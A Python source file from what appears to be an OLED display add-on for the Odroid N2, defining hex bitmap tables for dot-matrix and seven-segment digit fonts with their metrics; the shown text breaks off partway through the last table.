60b91680da8d8918e7dea466cf5e91d9b80e9ca4
|
[
"MIT"
] | 10
|
2019-08-31T23:15:30.000Z
|
2021-11-30T08:53:11.000Z
|
lib/charset.py
|
roidy/script.odroidn2.oled
|
60b91680da8d8918e7dea466cf5e91d9b80e9ca4
|
[
"MIT"
] | 3
|
2020-05-02T11:55:52.000Z
|
2021-03-18T16:13:31.000Z
|
lib/charset.py
|
roidy/script.odroidn2.oled
|
60b91680da8d8918e7dea466cf5e91d9b80e9ca4
|
[
"MIT"
] | 3
|
2021-03-18T08:33:02.000Z
|
2021-03-23T16:06:24.000Z
|
# Dot-matrix style bitmap font: 11 glyph rows of 42 column bytes each,
# followed by a trailing metrics entry [14, 3, 18, 11].
# NOTE(review): the 11 glyphs presumably cover the digits 0-9 plus a
# colon/separator, and the metrics entry presumably follows the
# width/height/stride convention used elsewhere in this file — confirm
# against the drawing code that consumes this table.
dotmatrix = [[0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0xdb, 0xdb,
    0x0, 0xc0, 0xc0, 0x0, 0x18, 0x18, 0x0, 0x3, 0x3, 0x0, 0xdb, 0xdb, 0x6, 0x6, 0x0, 0x30,
    0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
    [0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0x6c, 0x6c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0xdb, 0xdb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
    0x30, 0x0, 0x36, 0x36, 0x0, 0x30, 0x30, 0x0, 0x0, 0x0],
    [0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0x0, 0x18, 0x18, 0x0, 0x3, 0x3, 0x30, 0x30, 0x0, 0x36,
    0x36, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30],
    [0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xc3, 0xc3, 0x6, 0x6, 0x0, 0x30,
    0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
    [0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0x6c, 0x6c, 0x0, 0x0, 0x0, 0xd8, 0xd8,
    0x0, 0xc3, 0xc3, 0x0, 0xc0, 0xc0, 0x0, 0xdb, 0xdb, 0x0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x36, 0x36, 0x0, 0x0, 0x0],
    [0x6c, 0x6c, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x3, 0x3,
    0x0, 0x3, 0x3, 0x0, 0x3, 0x3, 0x0, 0x3, 0x3, 0x0, 0xd8, 0xd8, 0x6, 0x6, 0x0, 0x30,
    0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
    [0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x0, 0x0, 0xdb, 0xdb,
    0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xc0, 0xc0, 0x6, 0x6, 0x0, 0x30,
    0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
    [0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x6c, 0x6c, 0x0, 0x0,
    0x0, 0xc0, 0xc0, 0x0, 0x18, 0x18, 0x0, 0x3, 0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x36,
    0x36, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
    [0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0xc3, 0xc3,
    0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xc3, 0xc3, 0x6, 0x6, 0x0, 0x30,
    0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
    [0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0x3, 0x3,
    0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xdb, 0xdb, 0x0, 0x0, 0x0, 0x30,
    0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6, 0x0, 0x0, 0x0],
    [0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0xc3, 0xc3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6,
    0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
    [14, 3, 18, 11]]
# Larger variant of the dot-matrix bitmap font: 11 glyph rows of 76 column
# bytes each, followed by a trailing metrics entry [19, 4, 22, 10].
# NOTE(review): glyph order and metrics meaning presumed to mirror
# `dotmatrix` above — confirm against the consuming renderer.
dotmatrixLarge = [[0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0xc0, 0xc0, 0xc0, 0xdd, 0xdd, 0xdd, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c,
    0x1c, 0x1c, 0x0, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1,
    0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd, 0xdd, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
    [0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd,
    0xdd, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0],
    [0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0xc0, 0xc0, 0xc0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0,
    0xc0, 0xc0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c,
    0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1d, 0x1d, 0x1d,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c],
    [0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0xdc, 0xdc, 0xdc, 0x0,
    0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0xc1,
    0xc1, 0xc1, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdc, 0xdc, 0xdc, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
    [0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xdc, 0xdc, 0xdc, 0x0,
    0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdd,
    0xdd, 0xdd, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c,
    0x1c, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0],
    [0xdc, 0xdc, 0xdc, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0x1c, 0x1c, 0x1c, 0x1d, 0x1d, 0x1d, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c,
    0x1c, 0x1c, 0x0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd, 0xdd, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
    [0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0x0, 0x0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0xc1, 0xc1, 0xc1, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0,
    0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x1,
    0x1, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdc, 0xdc, 0xdc, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
    [0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0xdc, 0xdc, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c,
    0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0x1, 0x1,
    0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
    [0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0xc0, 0xc0, 0xc0, 0x1d, 0x1d, 0x1d, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0,
    0xc0, 0xc0, 0x0, 0x1d, 0x1d, 0x1d, 0xdc, 0xdc, 0xdc, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x1,
    0x1, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdc, 0xdc, 0xdc, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
    [0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
    0xc0, 0xc0, 0xc0, 0x1d, 0x1d, 0x1d, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0,
    0xc0, 0xc0, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x1,
    0x1, 0x0, 0xc1, 0xc1, 0xc1, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c,
    0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0],
    [0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
    [19, 4, 22, 10]]
# Seven-segment style bitmap font: 11 glyph rows of 48 column bytes each,
# followed by a trailing metrics entry [16, 3, 18, 9].
# NOTE(review): glyph order and metrics meaning presumed to mirror
# `dotmatrix` above — confirm against the consuming renderer.
sevenSeg = [[0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
    0xc3, 0xe7, 0xc3, 0x81, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x81, 0xc3, 0xe7, 0xc3,
    0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
    [0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0xf8, 0xfc, 0xf8,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x81, 0xc3, 0xe7, 0xc3,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x1f, 0x3f, 0x1f],
    [0x0, 0x0, 0x2, 0x7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
    0xc0, 0xe0, 0xd8, 0xbc, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3d, 0x1b, 0x7, 0x3,
    0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xe0, 0x40, 0x0, 0x0],
    [0x0, 0x0, 0x2, 0x7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
    0x0, 0x0, 0x18, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
    0x0, 0x0, 0x40, 0xe0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
    [0xf8, 0xfc, 0xf8, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0xf8, 0xfc, 0xf8,
    0x3, 0x7, 0x1b, 0x3d, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x1f, 0x3f, 0x1f],
    [0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0x7, 0x2, 0x0, 0x0,
    0x3, 0x7, 0x1b, 0x3d, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbc, 0xd8, 0xe0, 0xc0,
    0x0, 0x0, 0x40, 0xe0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
    [0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0x7, 0x2, 0x0, 0x0,
    0xc3, 0xe7, 0xdb, 0xbd, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbc, 0xd8, 0xe0, 0xc0,
    0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
    [0x0, 0x0, 0x2, 0x7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x81, 0xc3, 0xe7, 0xc3,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x1f, 0x3f, 0x1f],
    [0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
    0xc3, 0xe7, 0xdb, 0xbd, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
    0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
    [0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
    0x3, 0x7, 0x1b, 0x3d, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
    0x0, 0x0, 0x40, 0xe0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
    [0x0, 0x0, 0x80, 0xc0, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x81, 0xc3, 0x81, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x1, 0x3, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
    [16, 3, 18, 9]]
# Larger variant of the seven-segment bitmap font: 11 glyph rows of 68
# column bytes each, followed by a trailing metrics entry [17, 4, 23, 9].
# NOTE(review): glyph order and metrics meaning presumed to mirror
# `dotmatrix` above — confirm against the consuming renderer.
sevenSegLarge = [[0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
    0xc0, 0x3f, 0x7f, 0x3f, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x3f,
    0x7f, 0x3f, 0xfc, 0xfe, 0xfc, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
    0xfc, 0xfe, 0xfc, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x39, 0x13, 0x7, 0x3],
    [0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xe0,
    0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x3f,
    0x7f, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
    0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x1, 0x3, 0x7, 0x3],
    [0x0, 0x0, 0x8, 0x1c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
    0xc0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
    0x7f, 0x3f, 0xfc, 0xfe, 0xfc, 0xf9, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x1,
    0x0, 0x0, 0x0, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x38, 0x10, 0x0, 0x0],
    [0x0, 0x0, 0x8, 0x1c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
    0xc0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
    0x7f, 0x3f, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
    0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x10, 0x38, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x39, 0x13, 0x7, 0x3],
    [0xc0, 0xe0, 0xc0, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xe0,
    0xc0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
    0x7f, 0x3f, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
    0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x1, 0x3, 0x7, 0x3],
    [0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x1c, 0x8, 0x0,
    0x0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x80, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
    0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x10, 0x38, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x39, 0x13, 0x7, 0x3],
    [0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x1c, 0x8, 0x0,
    0x0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x80, 0x0,
    0x0, 0x0, 0xfc, 0xfe, 0xfc, 0xf9, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
    0xfc, 0xfe, 0xfc, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x39, 0x13, 0x7, 0x3],
    [0x0, 0x0, 0x8, 0x1c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
    0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x3f,
    0x7f, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
    0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x1, 0x3, 0x7, 0x3],
    [0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
    0xc0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
    0x7f, 0x3f, 0xfc, 0xfe, 0xfc, 0xf9, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
    0xfc, 0xfe, 0xfc, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x39, 0x13, 0x7, 0x3],
    [0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
    0xc0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
    0x7f, 0x3f, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
    0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x10, 0x38, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
    0x39, 0x13, 0x7, 0x3],
    [0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x8, 0x1c, 0x1c, 0x8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x10, 0x38, 0x38, 0x10, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
